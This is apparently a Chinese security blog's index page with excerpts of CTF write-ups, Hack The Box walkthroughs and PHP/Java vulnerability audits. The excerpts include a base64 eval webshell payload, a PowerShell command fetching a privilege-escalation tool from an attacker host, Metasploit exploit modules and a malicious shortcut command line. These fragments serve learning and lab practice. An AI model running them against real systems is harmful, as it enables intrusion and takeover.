自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(151)
  • 资源 (1)
  • 收藏
  • 关注

原创 博客搬家~

博客搬家

2022-11-08 09:50:38 295 1

原创 2022DASCTF Apr X FATE 防疫挑战赛 WriteUP

文章目录MiscSimpleFlowWebwarmup-phpsoeasy_phpMiscSimpleFlow看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包后面的包里面发现flag.zip但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量@eval(@base64_decode($_POST['m8f8d9db647ecd']));&e57fb9c067c677=o3&g479cf6f058c

2022-04-25 18:59:14 2198

原创 [*CTF2022]oh_my_lotto_revenge

New相对于oh_my_lotto,revenge进行了下面的更改这么做,我们能走的就只有RCE了,而这里唯一能操作的一个地方就是这里,可以操作环境变量os.environ[lotto_key] = lotto_value这里有几个非预期解,先看看预期解Intented writeup这里可以操控环境变量,那么我们能做的事情就很多了,预期解是操控HOSTALIASES修改hosts因为他的wget是通过域名下载的os.system('wget --content-disposition

2022-04-21 18:58:26 2867 1

原创 [Hack The Box]靶机8 Optimum

nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看打开是HFS,nmap扫出来是HFS2.3这个版本的HFS是有cve的https://nvd.nist.gov/vuln/detail/CVE-2014-6287msf有这个模块直接拿下shell拿到user.txt进不了admin,需要提权本地起一个python服务,把winpeas传上去powershell -c "(new-object System.Net.WebClient).Dow.

2022-04-01 20:55:09 422

原创 [Hack The Box]靶机6 Legacy && 靶机7 Blue

老规矩,namp一把嗦扫端口开启了139,445和3389,web都没开一个,那肯定得从其他方面下手了从namp结果看起来,貌似得从smb这里下手直接用nmap进行漏扫nmap --script=vuln 10.10.10.4这里都直接扫出来了,ms17-010,msf可以打的直接拿到shell权限也都是admin,直接拿下两个flag...

2022-04-01 00:19:13 3735

原创 [Hack The Box]靶机5 Netmon

HTB Netmon

2022-03-30 23:14:40 230

原创 [Java安全]类加载器ClassLoader

前言借用了先知社区的文章的一张图来解释这个原理负责动态加载Java类到Java虚拟机的内存空间中,用于加载系统、网络或者其他来源的类文件。Java源代码通过javac编译器编译成类文件,然后JVM来执行类文件中的字节码来执行程序。类加载器介绍类加载器大致分为两类:JVM 默认类加载器用户自定义类加载器类加载器分类引导类加载器(BootstrapClassLoader):属于jvm一部分,不继承java.lang.ClassLoader类,也没有父加载器,主要负责加载核心java库(即

2022-03-30 01:56:15 254

原创 [Hack The Box]靶机4 Jerry

首先用nmap进行端口扫描,看到只开启了8080端口,是Tomcat给出的是默认界面dirmap扫描了一下目录去manager管理页面看看,他需要认证他提示密码为s3cret,试了一下真是这个,倒省事了,不用我自己爆破进tomcat的后台就好弄了哦,getshell方法多的是,这里写的挺多的,这里我选择直接用是msf打,方便点use exploit/multi/http/tomcat_mgr_upload直接打通在Administrator的桌面发现flagcd C:.

2022-03-29 17:26:48 508

原创 [Hack The Box]靶机3 Lame

配置好hosts,这里有laboratory.htb和git.laboratory.htbnamp一把嗦,扫出22、80、443端口

2022-03-28 11:48:50 228

原创 [Hack The Box]靶机2 Backdoor

nmap先嗦一把,开了22端口、80端口和1337端口访问是一个wordpress博客网站wpscan扫一下版本是5.8.1再看看网站,这里会跳转backdoor.htb,配置一下hostsecho 10.10.11.125 backdoor.htb >> /etc/hosts扫一下目录这里有目录遍历这里有一个eBook-download的插件在readme里面看到版本信息,找找看有没有什么漏洞版本好像是1.1的确有漏洞,任意文件下载拿到一个数据库的.

2022-03-25 14:20:46 3133

原创 [Hack The Box] 靶机1 Meow+Paper

前言久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干这次就算是对这个平台的一个熟悉操作吧Meow下载到了open文件,kali连接上然后测试一下可以ping通了然后就开nmap跑nmap -sV 10.129.160.90开启了23端口,telnet服务,直接连接,root账户直接拿flag这个算是白给的Paper下面就开始打正式的靶机了一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个

2022-03-24 22:20:02 1726 1

原创 [HMGCTF2022]wp

WEBFan website首先是一个www.zip的源码泄露,是laminas框架mvc的框架首先就是看路由在\module\Album\src\Controller\AlbumController.php里面有功能点<?phpnamespace Album\Controller;use Album\Model\AlbumTable;use Laminas\Mvc\Controller\AbstractActionController;use Laminas\View\Mode

2022-03-24 17:58:34 4114

原创 [Java安全] 反射

前言准备入手学习java的安全了,感觉这也是一个大的趋势,想着尽早进入到java安全的探索中,在反序列化链的学习之前,需要先学习反射,不多说了,开干吧反射反射定义对象可以通过反射获取他的类,类可以通过反射拿到所有⽅法(包括私有)通过java语言中的反射机制可以操作字节码文件,可以读和修改字节码文件反射的基本运用1. 获取类对象a. forName()方法只需要知道类名,在加载JDBC的时候会采用实例代码public class test1 { public static voi

2022-03-06 22:50:43 5972 6

原创 [VNCTF2022]部分wp

VNCTF2022

2022-02-23 12:58:54 655

原创 [SCTF2021]Upload_it_1复现闭包组件反序列化rce

题目地址SycloverTeam提供了题目的docker环境https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1wp首先题目给了composer.json{ "name": "sctf2021/upload", "authors": [ { "name": "AFKL", "email": "upload@qq.com"

2022-02-11 22:44:49 3358

原创 [HWS&DasCTF]misc

babypdf附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的看一下目标%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr

2022-01-28 18:42:02 1021 1

原创 [第二届赣网杯]部分wp

第二届赣网杯

2021-12-06 23:37:34 1856 2

原创 [Java多线程]线程创建的三种方式,线程的互斥,线程的同步

前言多线程:指的是这个程序(一个进程)运行时产生了不止一个线程并行和并发:并行:多个cpu实例或者多台机器同时执行一段处理逻辑,是真正的同时。并发:通过cpu调度算法,让用户看上去同时执行,实际上从cpu操作层面不是真正的同时。并发往往在场景中有公用的资源,那么针对这个公用的资源往往产生瓶颈,我们会用TPS或者QPS来反应这个系统的处理能力。线程创建最基础的主要分为两种方法继承Thread类实现Runnable接口创建Thread类的子类,用这种方法生成新线程,可以按以下步骤进行:

2021-12-01 19:22:39 677

原创 [2021极客大挑战]部分wp

Where_is_my_FUMO开局是给了一个反弹shell的命令执行<?phpfunction chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_list, "", $str);}if (isset($_GET['DATA'])) { $data = $_GET['DATA']; $add

2021-11-30 08:26:19 3781

原创 [代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析

前言漏洞存在版本,分为两大版本:ThinkPHP 5.0-5.0.24ThinkPHP 5.1.0-5.1.30环境搭建composer create-project topthink/think=5.0.5 thinkphp5.0.5 --prefer-dist修改composer.json"require": { "php": ">=5.4.0", "topthink/framework": "5.0.5"},执行composer update

2021-11-26 01:08:14 5455 3

原创 [西湖论剑]yuas的秘密wp

yusa的秘密filescan找到了一个contack文件,提示到了便筏dump出便筏的数据文件开一个win7虚拟机,打开便筏数据文件存放的地址C:\Users\Administrator\AppData\Roaming\Microsoft\Sticky Notes导入snt文件,然后看到便筏内容,世界没了心跳试了一轮,这个密码可以打开key.zip里面的内容是from PIL import Imageimport structpic = Image.open('key.bmp'

2021-11-22 13:13:34 811 1

原创 [Java GUI]几种计算器的实现

按键为操作符import javax.swing.*;import java.awt.*;import java.awt.event.ActionEvent;import java.awt.event.ActionListener;public class Work2 extends JFrame implements ActionListener { private JButton bt_add,bt_sub,bt_mul,bt_div; private JTextField

2021-11-17 10:18:34 200

原创 [Java GUI]学习笔记

JFrame常用方法// 设置窗口的 标题void setTitle(String title)// 设置窗口的 图标void setIconImage(Image image)// 设置窗口的 宽高void setSize(int width, int height)void setSize(Dimension d)/** * 设置窗口关闭按钮点击后的默认操作, 参考值: * WindowConstants.DO_NOTHING_ON_CLOSE: 不执行任何操作。

2021-11-17 09:56:08 335

原创 [代码审计]yii2 反序列化漏洞分析

前言

2021-11-16 21:34:10 3483

原创 [代码审计]ThinkPHP5的文件包含漏洞

漏洞影响范围加载模版解析变量时存在变量覆盖问题,导致文件包含漏洞的产生漏洞影响版本:5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10tp框架搭建tp框架由两部分组成应用项目: https://github.com/top-think/think核心框架: https://github.com/top-think/framework框架下载好后,需要更名为thinkphp访问localhost/tp5.0.1/publi

2021-11-03 02:06:48 1095

原创 [红日靶场]ATT&CK实战系列——红队实战(—)

环境搭建靶场地址该靶场给了三台虚拟机下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019靶场环境是这样的web服务器由win7来搞,网络可以按照官方给的配置但由于我习惯了用自己的windows打,所以我把win7设置成nat,另一个网络设成vm1另外两个虚拟机的网络适配器都设置成vm1NAT的子网是192.168.159.0/24在win7里面的phpstudy打开服务成功访问以上就已经搭建好了环境了WEB服务渗透n

2021-10-17 15:34:58 859

原创 [2021江西省赛高校组]wp

easyphp前端代码泄露foreach ($_POST as $item => $value){ $$item=$$value; $secret = $$item;}foreach ($_GET as $key => $value){ if ($key=='flag'){ $str=$value; $$str=$secret; }}if (isset($hehe)){ echo "<center>"

2021-09-28 01:30:27 1138 2

原创 [2021强网杯青少年]ssrf+fpm

best_php<?phphighlight_file(__FILE__);//like fpm?class Crawl{ public $url; function __construct($url){ if(substr($url,0,7)==="http://"){ $this->url = $url; }else{ $this->url = "http://127.0.0.1/"

2021-09-26 17:37:36 406 1

原创 [Java代码审计]——远程调试初探

Jar包的调试这里以冰蝎做示例把冰蝎的jar包和他必须的db数据库文件放到项目的lib目录下把jar包添加到库如下配置调试配置新建远程JVM调试JVM的命令行参数,根据JDK的版本去选择然后比如在这打一个断点然后在jar包目录下执行如下命令,后面的参数是刚刚配置调试的那个配置注意这里,suspend要改成y,不然会卡不住断点,这个参数的意思是:是否等待调试器的接入回到idea,debug就可以卡住断点了Weblogic的远程调试这里我们是以dacker来配合Idea进行代码

2021-09-18 00:53:53 442

原创 2021第五空间网络安全大赛

WebFTPhttps://github.com/wifeat/WebFTP根据github的源码,去对网站进行分析,有写到初始账号但是题目改了密码,登不进然后下载到题目的Config.php.bak,看到版本是v2.3出现了git泄漏,无法下载到文件,但是看到了目录结构找到探针http://114.115.185.167:32770/Readme/mytz.phphttp://114.115.185.167:32770/Readme/mytz.php?act=phpinfo直接找到f

2021-09-17 17:46:42 1163

原创 [羊城杯2021] wp

baby_volatility直接看镜像文件,查看cmdfilescan找到有一个ssh.txt想到之前搭建博客的时候就接触这个ssh密钥,拿去base64decode找到邮箱,去github找用户在历史commit里面有个这个??RCTF??去分析一下这个__APP__里面有html我直接去kali里面foremost一下打开后找到了一个隐蔽的flag,真难找。。U2FuZ0ZvcntTMF8zYXp5XzJfY3JhY2tfbm9vYl9wbGF5ZXJ9解出签到

2021-09-13 23:49:34 1262 1

原创 [祥云杯2021]几道简单题的wp

ezyiihttps://xz.aliyun.com/t/9948找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子exp<?phpnamespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc

2021-08-22 21:42:40 4285 15

原创 [BUUCTF]刷题记录8

[De1CTF 2019]SSRF Mepython代码审计ssrfhash拓展攻击flask题#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding(

2021-08-21 22:36:48 259

原创 [GKCTF2021]复现wp

签到打开流量包,分析http流用python转成字符串import binasciis = '64306c455357644251306c6e51554e4a5a3046355355737764306c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154576c44546d3952524

2021-08-21 22:36:12 421

原创 利用PHP的NAN和INF来获取字符串来自增绕过长度限制

最近在一道题目里面学到了一个新的小技巧在php中,字符串是可以递增的,如下:但是不可递减这道题是这样的<?phperror_reporting(0);if ($_GET['looklook']){ highlight_file(__FILE__);}else{ setcookie("hint", "?looklook", time()+3600);}if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf

2021-08-19 00:20:31 751

原创 [CTFshow]吃瓜杯复现wp

热身<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,

2021-08-19 00:05:12 789 2

原创 Javaweb学习笔记8(Response对象)

Response对象功能:设置响应消息设置响应行格式:HTTP/1.1 200 ok设置状态码:setStatus(int sc)设置响应头:setHeader(String name, String value)设置响应体:使用步骤:获取输出流字符输出流:PrintWriter getWriter()字节输出流:ServletOutputStream getOutputStream()使用输出流,将数据输出到客户端浏览器重定向创

2021-08-09 23:10:44 134

原创 [CTFshow]吃鸡杯

在?看看密码给了一个vmem文件,内存取证搞密码肯定一开始想到系统用户的密码volatility --profile=Win7SP1x64 -f looklookpassword.vmem hivelistvolatility --profile=Win7SP1x64 -f looklookpassword.vmem hashdump -y 0xfffff8a000024010 -s 0xfffff8a000dd7010找一下竟然没有密码那可能是浏览器里面保存了的密码 volatil

2021-08-06 02:50:00 1006

原创 Python数据结构——上机考试

实现一个链表,并构造一个方法,找到倒数第x个节点的值# 单链表节点创建class LNode: def __init__(self,elem,next = None): self.elem = elem self.next = next# 单链表创建class LList: def __init__(self): self.head = None# 头指针 self.rear = None# 尾指针 s

2021-06-22 00:12:25 444

原创 AFCTF校赛

fake留了一个.git文件,我们看一下日志是有两次提交的,有一次是真的flaggit loggit show 版本号我们再使用git show命令来查看内容stolen打开数据包,追踪tcp流首先看到上传了一个一句话木马然后是一个python文件这个python文件把flag的每一位都转化成ascii码再*16*16+1然后发送流给192.168.159.138再往下看,他执行了这个python文件那么就看他的包的内容,全部提取出来在转换成flag第一个果然是26

2021-06-05 17:34:22 985

御剑无字典大小限制1937版.rar

御剑无字典大小限制1937版

2021-01-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除